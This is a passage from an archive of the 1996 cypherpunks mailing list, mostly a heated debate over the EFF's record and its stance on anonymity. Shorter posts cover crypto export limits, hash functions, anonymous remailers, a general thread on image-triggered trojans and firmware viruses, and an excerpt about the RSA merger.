>the thousands of words and dozens of legal summaries I send to this list
>every month and I will begin to proof read carefully.

your legal summaries are impressive. your rabid criticisms leave
a sour taste in my mouth. measured criticism, I can deal with.

>> and you, like many other cypherpunks and cyberspace weasels, 
>> have a whine-and-shriek-from-the-shadows bent.
>
>And your point is?
>
>You'd like the shadows lifted?  Speaking without a true name attached is
>somehow evil?

really, an opinion without attribution is not worth as much as
one with it. there's no escaping this simple concept. I agree that
a pseudonym can gain a reputation, but yours has very little
associated with it to qualify criticism of EFF imho. so you have
posted regularly to the cpunk list. big deal.

>This is EFF talking.  "The situation is hopeless, bail now to preserve
>image."

EFF has changed its direction from working in washington. a straw man
statement if I ever heard one.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Surya Koneru <surya@premenos.com>
Date: Wed, 4 Sep 1996 06:07:23 +0800
To: "'cypherpunks@toad.com>
Subject: rc2 export limits..
Message-ID: <c=US%a=_%p=Premenos_Corp%l=KI-960903173340Z-2@ki.premenos.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,  Does anyone know the export limit for RC2 Key size ?  

--Surya




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 4 Sep 1996 05:59:12 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609030930.CAA09010@mail6.netcom.com>
Message-ID: <199609031737.KAA20451@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



agree with all of BS's points...

>Anonymous remailers support several things I want to do,
>and that I want other people be able to do:
>1) Let people have private conversations without being identified
>by third parties.
>2) Let people have private conversations without being identified
>by each other, voluntarily and respecting each others' rights.
>3) Let people broadcast things to the public that they might
>be afraid to do otherwise.
>4) Let people broadcast things to the public without their
>reputations, good or bad, affecting readers' reactions.
>5) Let people experiment with different personality and
>conversation styles, though this doesn't strictly require anonymity.
>6) Let people communicate with government officials without risk.

I suspect all these items can be accomplished using means other
than anonymous remailers. anonymous remailers are a good start,
but possibly there is still technology waiting to be invented to
support some of these features.

one possibility that I'm very interested in: consider that
Usenet was not built from the ground-up to support anonymity,
nor was the sendmail system. when anonymity was introduced to
Usenet, everyone went crazy, and it was only marginally supported.

I think I may work on some technical proposals along these lines
for future posting here, because much of this dialogue has me thinking.

what cpunks might consider doing is creating an alternative message
distribution system like Usenet that starts from the premise that
anonymous communication is allowed and trying to grow it.

btw, McCullagh's and other's claims about "ghettoization" of 
anonymity strike me as very specious. as long as people can use
anonymity in some forum they want, I think that's acceptable. what's
the equivalent of a "ghetto" in cyberspace? you can't go into
a meeting of professionals wearing a ski mask, although you might
be able to create such a forum yourself. does that mean you are
in some kind of a "ghetto"?  oh, brother.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Wed, 4 Sep 1996 03:52:17 +0800
To: cypherpunks@toad.com
Subject: Re: Moscowchannel.com hack
Message-ID: <199609031548.KAA04410@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


: On Sat, 31 Aug 1996, Joel McNamara wrote:

: > Just a matter of time before some builds a dedicated Satan type tool that
: > scans for  HTTP server holes or messed up file permissions to make locating
: > potential victims easy.

Snow replied:

: Write your web site to a CD-ROM and hard-code the base directory into the
: webserver.

Or host it on something with mandatory access control protections.
There are still a handful of us building such things, and they can
give really good protection to web page contents.

Rick.
smith@sctc.com         secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 06:35:21 +0800
To: "James A. Donald" <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.16.19960903130738.422f617c@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 PM 9/2/96 -0700, James A. Donald wrote:
>At 06:52 AM 9/3/96 -0500, Jon Lebkowsky wrote:
>> "Uncompromising" is not an "element of legislative influence," at least not
>> on this planet.


>Therefore the correct strategy is simply to attack any politician who shows
>any interest in legislating on our issues.
>
>We have no friends on Capitol hill, and if we did have friends, it would
>still be necessary to denounce them as enemies.

As I said, on *this* planet.

--
Jon Lebkowsky           http://www.well.com/~jonl              jonl@hotwired.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Costin RAIU <craiu@pcnet.pcnet.ro>
Date: Tue, 3 Sep 1996 19:31:12 +0800
To: "'cypherpunks@toad.com>
Subject: Message Digest
Message-ID: <01BB9989.81517870@dial15.pcnet.ro>
MIME-Version: 1.0
Content-Type: text/plain



Hi, cypherpunks

I'm interested in a 256 bits (or more) message digest algorithm (C source is better). Any URLs ?

bye,
 c0s

*-----------------------------------------------------------------------------*
|    Costin RAIU, D.S.E. (craiu@pcnet.pcnet.ro)                               |
|    UNIX++C, RAYTRACING, RAVE, anime and SF(ST) fan                          |
|                                                                             |
|    "Windows95 - Tomorrow's bugs, Today"                                     |
*-----------------------------------------------------------------------------*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Reese <preese@erinet.com>
Date: Wed, 4 Sep 1996 03:35:18 +0800
To: patrickbc@juno.com (patrick b cummings)
Subject: re:hackerlist
Message-ID: <2.2.32.19960903111744.8c66f01c@erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 AM 9/1/96 EDT, you wrote:

Get a clue!  Why on earth would you want a list like this and why on earth
would anyone want to place themselves on such a list?

Dumb idea!  Proves the kind of clientel that Juno opens the doorways of
Internet E-mail to....  

>I am planning to make a list of hackers and would appreciatte it if you
>would e-mail me with the following information.
>handle
>e-mail
>city,state
>url
>whether or not you would like to recieve the list when finished
>                                   thanks for your help
>    P. Cummings
>    Patrickbc@juno.com
>
>
Reply-To: preese@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 4 Sep 1996 10:26:15 +0800
To: craiu@pcnet.pcnet.ro>
Subject: Re: Message Digest
In-Reply-To: <01BB9989.81517870@dial15.pcnet.ro>
Message-ID: <Pine.LNX.3.95.960903112920.259A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 3 Sep 1996, Costin RAIU wrote:

> I'm interested in a 256 bits (or more) message digest algorithm
> (C source is better). Any URLs ?

Try HAVAL.  It is a variable one-way hash function that is apparently secure
against collisions.  It should be on any of the standard crypto FTP sites.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMixPHCzIPc7jvyFpAQHzvQf/ehXClQ/hfTRYCe7bQZh03vZWQOJqbvOo
iwteOol5yJMpkwFy/ytj86cUm/ge1b7ASGE14U79MHaEucEV17OspHGMYl61l+IY
U05rcajORmGqO1WvwU50tvU9viqFO/F6OiFu+BSd4mKIHL1iyLlw3+X7RtMeD5Ol
y9XZVNV4ErUh8RTFU1bMj7I04YWFGt0jk78ona5RMjbNdqYX9r59h3recN/3M6TI
wZ5lS4aaR0nrUY8B1mI3ZPKqvEcJrqjEAq4eb8iVqX1/GkJoj3PR155ABsRhtKea
ZoE7Giz/9BYOaADBL2wp/m+E7QtnbGizKrOy2cFVi1sd1N4PAAl3mQ==
=aqHU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Date: Tue, 3 Sep 1996 21:08:34 +0800
To: remailer@replay.com
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To: <Pine.3.89.9609021532.A29664-0100000@netcom>
Message-ID: <9609030938.AA07849@amsqnt.nl.sequent.com>
MIME-Version: 1.0
Content-Type: text/plain


::
Request-Remailing-To: remailer@huge.cajones.com

##
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

::
Request-Remailing-To: remailer@remailer.nl.com

##
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

::
Request-Remailing-To: furballs@netcom.com (Paul S. Penrod)

##
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

The one-and-only Paul S. Penrod once stated:
! 
! This has been done in the past using several vairants (but not in a image 
! program).
! 
! The key to the success is that the application in question has to be 
! compromised to respond to these codes, either by design or by hacking. 
! Either way the individual responsible must modify the execution 
! mechanism, not just the data itself.
! 
! Let's see -current examples of computing items with this kind of a 
! "feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the 
! list keeps growing.

And not  to forget  the future  of virii.  Modification  of the  BIOS of
parts of the PC platform (motherboard, SCSI interfaces), or the firmware
of drives.  Since these building blocks  are more and more equipped with
flash-like PROMS which  can be reprogrammed, they become  a valid target
for these kinds of programs.

! On Mon, 2 Sep 1996, Jason Wong wrote:
! 
! > 
! > Actually , THINK about it, it does makes a interesting idea for a trojan
! > horse doesn't it ? I mean, just get a solid graphic program, insert codes
! > into it so that when certain conditions, i.e. a particular gif or jpg file
! > is view, print, etc, the trojan activates !! 
! > ___________________________________________________________________________
! > 
! > Jason Wong (CNE, MCP)                                     Jason@MCSB.COM.SG
! > Network Engineer
! > MCSB Systems Pte Ltd
! > ___________________________________________________________________________

Deep Throat.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 08:19:44 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <Pine.SUN.3.94.960902190237.3068B-100000@polaris>
Message-ID: <199609031904.MAA23619@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


[again, since I'm not on the CP list these days, feel free to bounce this 
over to the list if it doesn't make it. I'm not sure what the 
non-subscriber posting policy is and/or whether such attempted posts are 
filtered out, though I seem to recall they didn't used to be.]

Black Unicorn typed:
> 
> On Mon, 2 Sep 1996, Vladimir Z. Nuri wrote:
> 
> > 
> > ah, the quasi-yearly ranting on EFF has started up. what a great
> > opportunity for drop-down-drag-dead flamewar.
> > 
> > Black Unicorn: I resent your holier-than-thou moral posturing
> > over EFF, and am going to attack it as representative of other
> > criticism I have seen of EFF. 
> 
> I, unlike EFF, have never compromised my efforts to make strong crypto,
> unescrowed strong crypto, and digitial communications, free from the FUD
> spouted by government and media alike.  I, unlike EFF, have never
> compromised my efforts to resist the expansion of a wiretap state.  I,
> unlike EFF, have never proported to be a political represenative for these
> positions and folded under the weakest of pressures like a reed.

EFF has done none of that either.

Compromise: 1. a settlement in which each side gives up some demands or 
makes concessions. 2. a) an adjustment of opposing principles, systems, 
etc., by modifying some aspects of each   b) the result of such an 
adjustment. 3. something midway between two other things   4. a) exposure,
as of one's reputation, to danger, suspicion, or disrepute   b) a 
weakening, as of one's principles, ideals, etc.) as for reasons of 
expediency.

1 did not occur. EFF yielded nothing on any of the issues you mention.
On Digital Telephony, which you clearly allude to, EFF opposed 
implementation of the wiretapping provisions of the CALEA bill from start 
to finish, and was instrumental in stripping most of them out, replacing 
them with new privacy protections.  2 did not occur. Our mission remains 
unedited from the day it was adopted, and EFF is just as committed to those
principles now as ever.  We don't have a system, in the relevant sense, 
as such.  There was no such adjustment, ergo no result of one.  3 does 
not apply in any relevant sense (our steadfast assault against the CDA is 
a "compromise" under such a definition because it was neither a total 
victory, nor a total loss - yet I'm certain this is not the definition of 
"compromise" that you intend).  4a is not relevant (that's the 
security/secrecy-related definition, a nonsequitur in this context).  4b
is simply a restatement of 2a - simply didn't happen.  Our results speak 
for themselves on this.
 
> > EFF is an organization that is professional and has
> > worked toward improving cyberspace. it is easy for someone
> > such as yourself to criticize such an organization anonymously,
> > but what is the justification of your criticism? to me someone
> > who has tried and failed, yet is still trying, is better than 
> > someone who has never tried.
> 
> I would put forth that you know nothing of my efforts, and therefore are
> in no position to judge me.  I would also put forth that the efforts of
> EFF, or lack thereof, are quite public.

I would put forth that the public factors of EFF's efforts are quite 
public, but that you know nothing of the internal factors of those 
efforts, and ergo lack sufficient knowledge to make the allegations you make.

> > what *constructive* 
> > alternative to EFF do you propose? if you have none, please shut up.
> 
> I think any organization that would apply political pressure rather than
> bow to it would be an alternative.  I think an organization in touch

I'm at a loss to think of any time in which EFF did otherwise.  I don't 
think you have any concept whatsoever what a fight EFF put up over 
Digital Telephony.  I would strongly advise a reading of the original 
version of the DT/CALEA bill, and the version that passed after EFF took 
an axe to it. You'll find a world of difference.  You're welcome.

We make no bones about the fact that the DT bill passing at all with 
wiretap provisions in it was a defeat.  Defeats happen.  Being defeated 
is not the same thing as bowing, as yielding the fight.

> enough with its own policy to prevent its staff and board from making
> embarassing big brother type proposals to curtail the ability of any of us
> to post without attributation would be an alternative.  I think an

In other words you propose an alternate EFF that censors its own boardmembers.
I'm not aware of any logical consistency that could adhere to an 
organization that simultaneously says it supports free speech, yet 
demands that its board of directors never speak except in agreement with 
the organization's policy.  You are asking for a mini-dictatorship.  EFF 
has no position on anonymity.  We also have no position on abortion or on 
whether roast duck is better than fried chicken. You are in essence 
demanding that EFF impeach any boardmember that offers an opinion in 
public or in private about whether or not chicken is good stuff, or states
a belief about right to choose v. right to life positions.  

I'm sorry that we are not totalitarian enough for you.

Incidentally, Dyson made no such proposal as you refer to, but simply 
expressed questions and doubts about the misuse of anonymity, and made a 
clear and correct statement of fact ("you need to be able to get at 
somebody's identity to enforce accountability") without offering any 
value judgement about whether that was a good idea. She concluded that 
"the question is how do you also enforce freedom of speech and freedom 
from prosecution for unpopular opinions," clearly indicating at least as 
much doubt about the value of any attempt to force identifiability and 
accountability.  Even Dyson's lead statement that "the damage that can be 
done by anonymity is far bigger" online that offline is factually correct,
and does not consist of any kind of value judgement. It's simply an 
honest and, IMNERHO, necessary observation.  If we lie to the public, or 
lie to ourselves, we lose, because the opposition will have arguements we 
have not even looked at much less wrestled with.

I'm sorry we are not self-delusional and dishonest enough for you.

> organization without the internal conflict and strife that has clearly
> marred EFF in past and made it a laughable attempt at cohesive political
> persuasion would be an alternative.  

I have news for you: We are human.  Incidentally, two points: 1) 
"cohesive political persuasion" is not the be-all and end-all of civil 
liberties work, just a part of it; and 2) the political cohesion you want 
to see is very hard to accomplish, because civil libertarians are loath 
to march in lockstep. Compare the Christian Coalition and their allies -
authoritarians all. It is no surprise, on a moment's consideration, that 
their spot on the politics-of-rights-and-authority axis has everything to do 
with their ability to suspend disbelief, to embrace blind faith, and to act 
in unison.  BUT - a lot of progress is being made.  EFF, ACLU, CDT, VTW, 
EPIC, et al., are all coordinating like never before, new global-scale 
civil liberties coalitions are forming, joint legal cases being filed, 
joint press releases and action alerts, being issued, conferences 
organized together, etc.  What you are looking for is evolving as we type.

> I think an organization that had
> official policies on the core issues which it proposes to influence would
> be an alternative.

EFF has that. We have not proposed to influence anonymity issues, and we 
do not have a policy on that issue.  When we have a policy on it, we'll 
probably propose to influence it.

> In short, an organization that had even one of the needed elements of
> legislative influence.  (Cohesive, directed, persistent, and
> uncompromising).

We have all of these elements, but we have a lot more to do than engage 
in legislative influence. You've all seen how well that worked.  The 
process is very corrupt, so we have to use it sparingly, and only 
when nececessary.  The bulk of our work has to be done in other areas 
like supporting technical development, fighting cases to the Supreme Court,
direct grassroots action campaigns, public education, media exposure, etc.
All of these things directly affect the Hill, but EFF is not solely a 
lobbying organization.  Even CDT and other DC-based groups are not solely 
lobbying organizations.

> > I am tired of people announcing loudly to the world, "well if EFF
> > doesn't support [insert my personal jihad here], then they're 
> > a bunch of losers who don't deserve anyone's money".
> 
> Now who's holier-than-thou?  What is so shocking about announcing that a
> given organization does not support my interests and therefore calling on
> others who share my interests not to make financial donations to said
> organization?  

What's shocking to me is that you'd state as fact "that a given 
organization does not support [your] interests" when you have no actual 
knowledge of whether that's true or not, just a vague perception based on 
clearly insufficient information, and misapprehensions of fact that are 
easily refutable.

> Is there something EFF fears in free speech and political
> consensus building?  Perhaps if they had a straightforward policy....

Certainly not. And please note that the person you are responding to does 
not speak for EFF, so your question is a nonsequitur.

[Some stuff skipped, since irrelevant.]

> > get a clue. an organization does not have to officially espouse what
> > its members espouse.
> 
> No, but when an organization espouses nothing on a given subject key to
> its mission, what does that say?  What about when its members espouse

That says that the board of that organization has yet to come to 
consensus on the issue.  Happens all the time.  Ask the ACLU - there are 
all kinds of issues that someone somewhere thinks is "key to its mission" 
that ACLU has not yet evolved a position on, and won't until they need to 
due to some event or impending event such as legislation or a court case.
Personally I agree with you that this issue is key to our mission, and I 
hope that EFF has a position on it soon.  But I'm not the chairman of the 
board, so I wait, and I speak my mind. I have no problem with you 
speaking your mind, or even being less willing to wait. But I have no 
respect for unfounded accusations and fingerpointing. I don't even have 
much respect for well-founded fingerpointing when it's not helpful.  
Cypherpunks are supposed to write code. This is a waste of time. 

> entirely different and even counter productive beliefs?  I would hardly
> trust Senator Burns on the board of the ACLU, or a George Pacific
> exec on Sierra Club's board.  What's different here?

Neither are on our board.  What's your point?
 
> > what an organization espouses should be carefully
> > crafted. if all members feel strongly about an issue, yet all also
> > feel that it should not be part of the official plank, then that may be
> > a wise decision to leave it out. what an organization does *not* do is as 
> > important as what it does do. EFF is learning, by trial and error and the
> > hard way, to "choose battles wisely".
> 
> I thought its point was to protect cyberspace?  What battles are left
> after Digital Telecom, Anonymous Communication, Strong Crypto and CDA?

About a thousand. Probably more.

> There aren't many battles to choose.  

What a laugh. Just an example: At least 12 US state have passed or are 
considering passing CDA-like state legislation.  Even after we kick the 
CDA's unconstitutional butt, each one of those state bills, with one or 
two exceptions if we're lucky, will have to be individually dealt with 
all the way to the state supreme courts in all probability, and quite 
possibly to the US Supreme Court in some cases.  None of these bills are 
direct clones of the CDA, and it's doubtful that a whole lot of the CDA 
ruling will apply to them, necessitating individual constitutionality 
challenges.   Now think on how many other jurisdictions there are in the 
world, from the local to the multinational, and consider how many of them 
have or are in the process of getting their own CDA-alike.  And this is 
before we even think about censorship of online "hate speech" or 
"dangerous information". This is just the anti-porn bills.  AND, when all 
is said and done the majority of these jurisdictions, especially the US 
federal Congress, are very likely to come right back and try it all 
again, with slightly modified bills that attempt to get around previous 
rulings.   This is complete aside from privacy issues which are even less 
clear-cut than free speech issues.  If you think there are a handful of 
issues to wrestle with, you are very, very sadly mistaken. There's an 
ocean of them.

> Let's seem some action.  

I must surmise you don't read much about us.

> I can sit
> on my hands all day long too, but I will hardly claim to be supporting
> hunger prevention in Africa by "thinking very hard about the subject."
> (Particularly not when I have accepted money to further that goal).

http://www.eff.org/pub/Legal/Cases/SJG
http://www.eff.org/pub/Legal/Cases/Phrack_Neidorf_Riggs
http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ
http://www.eff.org/pub/Legal/Cases/AABBS_Thomases_Memphis/
http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS
http://www.eff.org/pub/Legal/Cases/Church_of_Scientology_cases
http://www.eff.org/pub/Legal/Cases/Clipper_FOIA
http://www.eff.org/pub/Legal/Cases/PGP_Zimmermann
http://www.eff.org/pub/Legal/Cases/Gilmore_v_NSA
http://www.eff.org/pub/Legal/Cases/Karn_Schneier_export
http://www.eff.org/pub/Legal/Cases/Kerberos_export
http://www.eff.org/pub/Censorship/Internet_censorship_bills
http://www.eff.org/pub/Censorship/Rimm_CMU_Time
http://www.eff.org/pub/Censorship/GII_NII
http://www.eff.org/pub/Censorship/Hate-speech_discrimination
http://www.eff.org/pub/Censorship/Online_services
http://www.eff.org/pub/Censorship/Terrorism_militias
http://www.eff.org/pub/Privacy
http://www.eff.org/pub/Privacy/ITAR_export
http://www.eff.org/pub/Privacy/Key_escrow
http://www.eff.org/pub/Privacy/Crypto_bills_1996
http://www.eff.org/pub/Privacy/Digital_Telephony_FBI
http://www.eff.org/pub/Privacy/Email_GII_NII
http://www.eff.org/pub/Privacy/Terrorism_militias
http://www.eff.org/pub/Privacy/Tools
http://www.eff.org/pub/Activism/FOIA/ITAR_FOIA
http://www.eff.org/pub/GII_NII
http://www.eff.org/pub/GII_NII/Govt_docs
http://www.eff.org/pub/GII_NII/ISDN
http://www.eff.org/pub/GII_NII/NREN_NSFNET_NPN
http://www.eff.org/pub/Net_info/EFF_Net_Guide
http://www.eff.org/pub/Alerts/
http://www.eff.org/pub/Intellectual_property/NII_copyright_bill [EFF has
  a position on intprop in as much as the fair use rights of the public
  are involved, and we work with DFC on this issue.]
http://www.eff.org/blueribbon.html
http://www.eff.org/goldkey.html
http://www.ipc.org/ipc
http://www.crypto.com
http://www.etrust.org

and so forth and so on. That's just off the top of my head.

[Note: If one of these URLs doesn't work for you, stick "/index.html" at 
the end of it and try again, and/or try www2.eff.org instead of www.eff.org.]

> > I would love to see more info about EFF's new direction. but one
> > can ask for such clarification without a rabid style such as your own.
> 
> Are you one of those people who still believes you can get more flies with
> honey...?  Ever been to Washington, D.C.?

What does DC have to do with clarification of EFF's "new direction"?  EFF 
was not founded in DC, and is not based there now. CDT fissioned off to 
do the DC stuff.

> > blah, blah, blah. why should EFF give the slightest damn what you think
> > of them?
> 
> Its fairly clear that they don't.  That said, why should I not make that

You are mistaken.  Don't think for an instant I'd waste 5 seconds of 
staff time on you otherwise.  I have 10x more to do than I have time to 
do it in.

[rest deleted as irrelevant, since founded on mistaken assumption.]

> > why do I see so much of this in cyberspace and on the cpunks list:
> > gripes, gripes, gripes by people who have no record themselves of
> > doing anything constructive...? the difficulty of doing something
> > constructive is proven by the failures, it is not necessarily 
> > evidence of incompetence or conspiracies. perhaps you, Unicorn,
> > feel the cpunks have a greater track record than EFF? 
> 
> I do infact feel the cpunks have a greater track record than EFF.  Tell
> me, what has EFF done? 

See URLs above. Consider it a suggested reading list.

 The list of "cypherpunk" accomplishments in terms
> of making the net a better place to be is, in my view, significant.

Indeed it is.  I do not think it possible to quantify what EFF have done 
or what CPs have done, and then weigh the two against eachother. I have yet 
to see an accomplishometer. I also can't think of any point in doing so. 
This is not a contest.  We are on the same side.

> Certainly the discussion here is livelier than anything I've seen from
> EFF.

EFF is not a discussion forum (though we provide, in some sense, a pretty 
lively one at comp.org.eff.talk in Usenet. We also started 
alt.politics.datahighway, which sees some traffic, mostly about US govt 
"info superhighway" hype and b.s.   Comp.org.eff.talk is more general, 
and tends to focus on civil liberties issues and cases.)
 
> > >I would be most happy to be proven wrong and see EFF suddenly, in a burst
> > >of impressive moral fiber, speak out publically and take some political
> > >action to assure anonymous communication.
> > 
> > I would like you to explain why you feel the need to criticize EFF
> > for not necessarily sharing your own agenda.
> 
> The same reason I feel free to criticize communism for not sharing my own
> agenda.
> 
> You reveal here the basic character of your objection.  You don't like
> the fact that I criticized EFF.  It has nothing to do with the fact that
> you think EFF has done wonderful and fantastic things (you point to none
> in this post) but that you have some emotional fondness for them.  This is
> the trap.  EFF _sounds_ good, and so its worth sticking up for.  Well
> what, EFF, have you done for us LATELY?

Again, see above. See in particular:

http://www.eff.org/pub/Censorship/Internet_censorship_bills
 - PA court rules CDA unconstitutional

http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS - CA court rules 
 software - both source and object code - protected expression under the 
 First Amendment 
 
Both cases are headed for the Supreme Court.

NB: I think your criticism is valid at least in the abstract. It is 
certainly fair to ask what we've done, not how we sound or feel.  I think 
the refereces I've provided will answer that question adequately.

> > >Well, let's have a clear official position issued then to end all dispute.
> > 
> > again, you fail to grasp: EFF may justifiably not want to engage in that
> > fight. it might be a wise decision.  who are you to dictate EFF's
> > agenda? why are you picking a fight with someone who might be the
> > best ally?
> 
> If EFF is the best ally then we need to seek others.  They have done
> nothing in my view to help keep strong crypto around, to secure a person's
> right to speak without a citizen unit I.D. being attached, and to promote,
> by extension, free speech.  

Then you know absolutely diddley about what we are doing. Beware 
lecturing about that of which you know little.  If our legal cases win, 
we win all of the above concerns you just articulated. And both cases 
look very much like they will win hands down.  And, these are hardly the 
only fronts we are working on. 

> Look, even you have gotten on my case here for
> speaking without revealing my real name.  You think something I said

Notably I have not. Indeed, I mentioned to the board here that the fact 
that I've met you in person, signed your PGP key, had you and other DC 
CP's over to EFF's DC office for CP meetings, was a testament to 
anonymity/pseudonymity - I didn't need to know the name the government 
calls you buy, just needed to see enough evidence that you as a body are 
attached to Black Unicorn as a nym, and to have an idea of the reputation 
of the nym.

[non-relevant (to me) comments skipped.]

> > > Of
> > >course you should expect people to wonder about EFF when you have no
> > > official position and yet some staff and board members seem to have a
> > >statist bent.
> > 
> > and you, like many other cypherpunks and cyberspace weasels, 
> > have a whine-and-shriek-from-the-shadows bent.
> 
> And your point is?
> 
> You'd like the shadows lifted?  Speaking without a true name attached is
> somehow evil?

I tend to suspect the criticism had more to do with "all talk and no 
action" and other such concerns. Just my interpretation. 

> Why not make some solid arguments for why TCM is wrong then?  Certainly it
> appears he is on the mark to me.

The main flaw in this reasoning (which I'm not sure at all is actually 
Tim's reasoning, but appears to be the reasoning here) is that these 
efforts are not contradictory, but complementary. As a practical matter, 
the entire question is meaningless since neither effort can be measured, 
and there is no point in doing so in the first place, since no issue of 
whether or not the CPs or the EFF is 'better' has arisen, and no such 
issue makes sense.
 
> > I also don't understand the anonymity fight by cpunks. it's the
> > wrong battle imho. ask any remailer operators how their services
> > are panning out. they will complain of the incessant spam and
> > increasing litigious pressure. I don't see any technological 
> > solutions to these problems. if there were, they'd have been 
> > invented now. 
> 
> This is EFF talking.  "The situation is hopeless, bail now to preserve
> image."

Uh, no, that was someone talking, who has an individual opinion on the 
subject. One that I don't share and that I don't think anyone else shares 
at EFF either.  In particular, the litigatory pressures are likely to be 
groundless, at least in US law. There is a hell of a lot of caselaw 
supporting the rights to anonymous and pseudonymous speech and publication.
As for the spam problem, that can be rather trivially fixed with filters 
(or reduced, at least. Clever people will always find a way to break or 
abuse any given system.)

EFF has never "bailed" from any issue to preserve image.  If we'd been 
concerned with image, we would not have taken the tactic we did with 
DigTel - a tactic that worked incompletely but better than shouting "boo" 
from the sidelines, but a tactic which harmed our image very much. Such 
is the price we pay. Our mission is not "to look cool to the public", 
much less to Cypherpunks, our mission is to protect the public interest
and individual liberty.

> Explain to me how reputation systems work in the absence of anonymity.
> Explain to me when freedom has been anything but "a pain in the ass."

I have to agree wholeheartedly.
 
> Weakness is all you have to offer.  Offer it to EFF.

No thanks, we have no use for it.  We also have no use for pointless 
ankle-biting. Please, go write some code. That's what you guys are best 
at, and it's why you're here ("here" = cypherpunks).  If you are in need 
of a project, how about an anon remailer that runs on Windows 3.x, NT, 
and 95, and another for Mac?  There are what, maybe 20 operational 
chained remailers right now?  That's not going to cut it. There need to 
be more. (This is MY PERSONAL opinion, not an EFF statement of policy. 
For the time being anyway. :)

PS: No hard feelings are held here, on my part, and I intend to convey 
none, even if I do argue forcefully. I am not your enemy. Consider this a 
workout, some mental sparring to get the blood flowing.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 07:32:31 +0800
Subject: Re: SRP (from the cutting-room floor)
In-Reply-To: <9609031622.AA26229@clare.risley.aeat.co.uk>
Message-ID: <199609031909.MAA20276@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This sounds simple to implement by users and remailers,  after all,
cpunk messages with bad syntax -> /dev/null .

Users can implement this quite easily, simply use the cpunk 
more than you actually need to.  You are your best decoy.

I muse about the idea of remailers that freely allow anybody to
access the ques of the cpunk remailers with http and telnet.
If people are using the remailers properly, and the destination is
usenet, there's no loss to privacy.  This can even be implemented
with e-mail destinations, with no loss to privacy that isn't already 
lost simply by using the net itself.  Should this idea be 
implemented with the cpunk remailers, it can actually prevent the
seizure of the server by the authorities, considering how they
couldn't get anything they couldn't have already gotten by simply
telneting or httping in.  There is the reported risk of the timing
cryptanalysis attacks, so a que of messages can be made inaccessable
while the actual {en|de}cryption is being done. 

I plan on doing these things when I can get the Linux/BSD system
more figured out than I have.  I'm primarily intersted in learning,
so I plan on keeping an open system, other than the Mixmaster
binaries and other stuff affected by ITAR.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 4 Sep 1996 05:17:46 +0800
To: cypherpunks@toad.com
Subject: Flux in today's HotWired/Packet
Message-ID: <v0151010aae521c2db7eb@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


http://www.packet.com/flux/


The recently concluded merger of

Security Dynamics Technologies Inc. with

RSA Data Security Inc. may have offered

us one of our last opportunities for

insight into the bizarre and byzantine

business world of commercial

cryptography in America today. And one

of the chief insights we've gleaned from

Security Dynamics' filings with the

Securities and Exchange Commission about

the merger is that the company may have

bought not only a lemon, but a lemon

that, when swallowed, could make

Security Dynamics double over with food

poisoning. Why did Security Dynamics pay

nearly US$300 million for RSA, a company

which had less than $1 million in profit

last year on revenue of some $11

million? Furthermore, its encryption

patents will expire in four years, which

means that all RSA really owns is its

relationships with customers such as

Netscape and Hewlett-Packard. Even

worse, those patents are under attack at

the moment through a lawsuit filed

against RSA by Cylink Corporation, an

RSA competitor holding similar patents

that was a one-time partner in a failed

